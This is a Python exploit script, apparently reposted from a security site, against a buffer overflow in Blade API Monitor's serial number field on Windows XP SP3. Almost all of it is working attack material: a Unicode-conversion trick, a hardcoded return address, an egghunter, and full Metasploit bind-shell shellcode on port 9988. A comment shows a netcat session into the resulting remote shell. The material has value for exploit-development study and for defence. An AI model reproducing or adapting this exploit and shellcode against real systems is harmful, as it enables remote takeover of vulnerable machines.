The Enigma Group

Blade API Monitor Unicode Bypass (Serial Number BOF)


#!/usr/bin/python -w



#---------------------------------------------------------------------------------#

# Exploit: Blade API Monitor Unicode Bypass (Serial Number BOF)                   #

# Author: b33f (Ruben Boonen) - http://www.fuzzysecurity.com                      #

#                               http://www.fuzzysecurity.com/exploits/8.html      #

# OS: WinXP PRO SP3                                                               #

# Software: http://www.exploit-db.com/wp-content/themes/exploit/applications/     #

#           f248239d09b37400e8269cb1347c240e-BladeAPIMonitor-3.6.9.2.Setup.exe    #

#                                                                                 #

# Unicode Exploit by FullMetalFouad - http://www.exploit-db.com/exploits/18349/   #

#---------------------------------------------------------------------------------#

# This is a super strange exploit. First I would like to commend "FullMetalFouad" #

# for the unicode work on the original exploit. Originally I wanted to see if I   #

# could simplify the process. While I was doing that I lost sight of the fact     #

# that the instructions had to be printable since we need to copy them from a     #

# text file. When I opened my POC I saw that all the characters had been          #

# converted to weird blocks (check my site for a screenshot). On a whim I tried   #

# to paste these characters in the serial number field and amazingly the buffer   #

# in the debugger was intact but with one important difference, the unicode had   #

# been converted back to regular ASCII!! Very strange but super fortunate!! If    #

# you want to experiment with the exploit just keep in mind to (1) open it in     #

# windows notepad and (2) that all the characters need to be converted to those   #

# blocks for it to work (depending on your buffer this isn't always the case).    #

#---------------------------------------------------------------------------------#

# root@bt:~# nc -nv 192.168.111.128 9988                                          #

# (UNKNOWN) [192.168.111.128] 9988 (?) open                                       #

# Microsoft Windows XP [Version 5.1.2600]                                         #

# (C) Copyright 1985-2001 Microsoft Corp.                                         #

#                                                                                 #

# C:\Program Files\BladeAPIMonitor>ipconfig                                       #

# ipconfig                                                                        #

#                                                                                 #

# Windows IP Configuration                                                        #

#                                                                                 #

#                                                                                 #

# Ethernet adapter Local Area Connection:                                         #

#                                                                                 #

#        Connection-specific DNS Suffix  . : localdomain                          #

#        IP Address. . . . . . . . . . . . : 192.168.111.128                      #

#        Subnet Mask . . . . . . . . . . . : 255.255.255.0                        #

#        Default Gateway . . . . . . . . . :                                      #

#                                                                                 #

# C:\Program Files\BladeAPIMonitor>                                               #

#---------------------------------------------------------------------------------#



filename="PasteMe.txt"



#---------------------------------------------------------------------------------#

# Originally unicode instructions to put an address in EAX, here it is used to    #

# trigger notepad bug and get UNICODE => ASCII conversion...                      #

#---------------------------------------------------------------------------------#

UniKill = (

"\xB8\x06\xAA\x6F\x50"

"\x6F\x4C\x6F\x58\x6F"

"\x05\x73\x00\x6F\xB0"

"\xB9\xD8\xAA\x6F\xE8")



#Egghunter - Marker b33f

#Size 32-bytes

hunter = (

"\x66\x81\xca\xff"

"\x0f\x42\x52\x6a"

"\x02\x58\xcd\x2e"

"\x3c\x05\x5a\x74"

"\xef\xb8\x62\x33" #b3

"\x33\x66\x8b\xfa" #3f

"\xaf\x75\xea\xaf"

"\x75\xe7\xff\xe7")



#msfpayload windows/shell_bind_tcp LPORT=9988 R| msfencode -e x86/alpha_mixed -t c

#Size 742-bytes

shellcode = (

"\xd9\xe1\xd9\x74\x24\xf4\x59\x49\x49\x49\x49\x49\x49\x49\x49"

"\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41\x58"

"\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"

"\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c"

"\x48\x68\x4b\x39\x37\x70\x45\x50\x53\x30\x71\x70\x4f\x79\x69"

"\x75\x34\x71\x79\x42\x53\x54\x4c\x4b\x71\x42\x64\x70\x6c\x4b"

"\x42\x72\x66\x6c\x6c\x4b\x73\x62\x57\x64\x4e\x6b\x73\x42\x36"

"\x48\x36\x6f\x4f\x47\x71\x5a\x44\x66\x56\x51\x49\x6f\x75\x61"

"\x69\x50\x4c\x6c\x45\x6c\x61\x71\x61\x6c\x63\x32\x44\x6c\x47"

"\x50\x49\x51\x6a\x6f\x56\x6d\x55\x51\x49\x57\x4b\x52\x58\x70"

"\x62\x72\x76\x37\x4e\x6b\x56\x32\x34\x50\x6c\x4b\x47\x32\x37"

"\x4c\x73\x31\x5a\x70\x6c\x4b\x61\x50\x62\x58\x4d\x55\x49\x50"

"\x63\x44\x50\x4a\x36\x61\x5a\x70\x50\x50\x6e\x6b\x33\x78\x74"

"\x58\x4c\x4b\x63\x68\x57\x50\x45\x51\x4a\x73\x38\x63\x67\x4c"

"\x42\x69\x4e\x6b\x56\x54\x6c\x4b\x47\x71\x7a\x76\x35\x61\x59"

"\x6f\x56\x51\x49\x50\x6e\x4c\x6b\x71\x4a\x6f\x46\x6d\x67\x71"

"\x48\x47\x46\x58\x59\x70\x62\x55\x4a\x54\x56\x63\x43\x4d\x79"

"\x68\x75\x6b\x73\x4d\x46\x44\x63\x45\x4b\x52\x61\x48\x6e\x6b"

"\x70\x58\x46\x44\x65\x51\x4b\x63\x32\x46\x4c\x4b\x44\x4c\x50"

"\x4b\x4c\x4b\x46\x38\x77\x6c\x65\x51\x6b\x63\x4c\x4b\x76\x64"

"\x6e\x6b\x56\x61\x38\x50\x6e\x69\x32\x64\x76\x44\x44\x64\x71"

"\x4b\x71\x4b\x75\x31\x73\x69\x72\x7a\x72\x71\x59\x6f\x59\x70"

"\x76\x38\x63\x6f\x51\x4a\x4c\x4b\x74\x52\x78\x6b\x4e\x66\x71"

"\x4d\x51\x78\x67\x43\x46\x52\x37\x70\x43\x30\x31\x78\x71\x67"

"\x51\x63\x35\x62\x71\x4f\x76\x34\x42\x48\x50\x4c\x53\x47\x31"

"\x36\x54\x47\x69\x6f\x49\x45\x68\x38\x4e\x70\x37\x71\x67\x70"

"\x35\x50\x37\x59\x7a\x64\x52\x74\x50\x50\x63\x58\x51\x39\x4b"

"\x30\x30\x6b\x75\x50\x39\x6f\x69\x45\x32\x70\x76\x30\x42\x70"

"\x66\x30\x73\x70\x62\x70\x31\x50\x42\x70\x43\x58\x49\x7a\x64"

"\x4f\x4b\x6f\x39\x70\x59\x6f\x5a\x75\x6b\x39\x78\x47\x30\x31"

"\x49\x4b\x62\x73\x33\x58\x74\x42\x43\x30\x65\x77\x53\x34\x4c"

"\x49\x4a\x46\x70\x6a\x44\x50\x46\x36\x56\x37\x63\x58\x79\x52"

"\x39\x4b\x34\x77\x55\x37\x6b\x4f\x38\x55\x62\x73\x76\x37\x53"

"\x58\x6f\x47\x4b\x59\x37\x48\x6b\x4f\x69\x6f\x58\x55\x72\x73"

"\x30\x53\x53\x67\x50\x68\x54\x34\x78\x6c\x65\x6b\x6b\x51\x39"

"\x6f\x6e\x35\x61\x47\x6c\x49\x78\x47\x73\x58\x31\x65\x70\x6e"

"\x30\x4d\x45\x31\x79\x6f\x49\x45\x43\x58\x50\x63\x70\x6d\x43"

"\x54\x67\x70\x4d\x59\x39\x73\x76\x37\x53\x67\x32\x77\x56\x51"

"\x69\x66\x30\x6a\x52\x32\x36\x39\x33\x66\x6a\x42\x6b\x4d\x62"

"\x46\x6b\x77\x30\x44\x34\x64\x35\x6c\x43\x31\x67\x71\x4c\x4d"

"\x50\x44\x74\x64\x32\x30\x6f\x36\x75\x50\x53\x74\x70\x54\x32"

"\x70\x70\x56\x56\x36\x76\x36\x62\x66\x76\x36\x72\x6e\x36\x36"

"\x52\x76\x71\x43\x30\x56\x73\x58\x64\x39\x7a\x6c\x35\x6f\x6c"

"\x46\x59\x6f\x6e\x35\x6b\x39\x59\x70\x70\x4e\x51\x46\x47\x36"

"\x39\x6f\x34\x70\x55\x38\x44\x48\x6c\x47\x37\x6d\x33\x50\x49"

"\x6f\x4a\x75\x6d\x6b\x5a\x50\x6f\x45\x79\x32\x72\x76\x55\x38"

"\x4f\x56\x4d\x45\x4f\x4d\x4f\x6d\x6b\x4f\x69\x45\x47\x4c\x67"

"\x76\x43\x4c\x55\x5a\x6d\x50\x79\x6b\x4d\x30\x51\x65\x33\x35"

"\x4f\x4b\x62\x67\x37\x63\x31\x62\x62\x4f\x53\x5a\x37\x70\x76"

"\x33\x49\x6f\x4b\x65\x41\x41")



#---------------------------------------------------------------------------------#

# (*) Due to the wierd conversion i couldn't do proper badchar analysis           #

# (1) 0x00425e04 : push esp #  ret  | startnull,ascii ==> BladeAPIMonitor.exe     #

# (2) egghunter: We do this because we need more space than we have at ESP        #

# (3) alpha mixed Bindshell port 9988                                             #

#---------------------------------------------------------------------------------#



egg = "\x90"*18 + hunter

evil = "\x90"*10 + "b33f"*2 + shellcode

buffer = UniKill + "A"*560 + "\x04\x5E\x42\x00" + egg + "B"*500 + evil



textfile = open(filename , 'w')

textfile.write(buffer)

textfile.close()